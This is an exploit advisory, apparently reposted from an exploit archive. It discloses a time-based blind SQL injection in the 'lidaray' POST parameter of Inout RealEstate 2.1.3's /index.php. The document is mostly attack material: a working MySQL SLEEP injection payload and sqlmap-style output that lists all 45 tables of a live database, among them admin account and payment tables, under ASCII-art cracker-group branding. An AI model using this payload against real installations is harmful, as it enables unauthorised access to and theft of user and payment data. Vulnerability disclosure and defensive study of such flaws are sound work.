Exploit for Inout RealEstate 2.1.3 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:170637
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : inoutscripts.com │  
│ Vendor : Inout Scripts - Nesote Technologies Private Limited │  
│ Software : Inout RealEstate 2.1.3 │  
│ Vuln Type: SQL Injection │  
│ Impact : Database Access │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ │  
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │  
│ data and crash the application or make it unavailable, leading to lost revenue and │  
│ damage to a company's reputation. │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Path: /index.php  
  
POST parameter 'lidaray' is vulnerable to SQLI  
  
lidaray=[Inject-HERE]  
  
---  
Parameter: lidaray (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ  
---  
  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
[INFO] fetching tables for database: '*****_realestate'  
[INFO] fetching number of tables for database ''*****_realestate'  
Database: *****_realestate  
  
[45 tables]  
+--------------------------------+  
| adcode |  
| admin_account |  
| admin_payment_details |  
| agent_list_request_to_user |  
| broker_citymap |  
| broker_rate |  
| broker_review |  
| brokerabusereport |  
| category_property |  
| chat_details |  
| chat_messages |  
| checkout_ipn |  
| countries |  
| custom_field |  
| detail_statistics_list |  
| email_templates |  
| enquiry_status |  
| forgetpassword |  
| inout_ipns |  
| invoicegen |  
| languages |  
| list_brokermap |  
| list_images |  
| list_main |  
| listopenhouse |  
| normal_statistics_list |  
| paymentdetailstat |  
| popularsearchlist |  
| ppc_currency |  
| public_side_media_detail |  
| public_slide_images |  
| recentsearchlist |  
| settings |  
| sold_listing |  
| soldlistadd |  
| traveller_bank_deposit_history |  
| user_broker_licenses |  
| user_broker_registration |  
| user_email_verification |  
| user_list_agent_request |  
| user_registration |  
| user_wishlist_mapping |  
| userabusereport |  
| userlistactive |  
| wish_list |  
+--------------------------------+  
  
[-] Done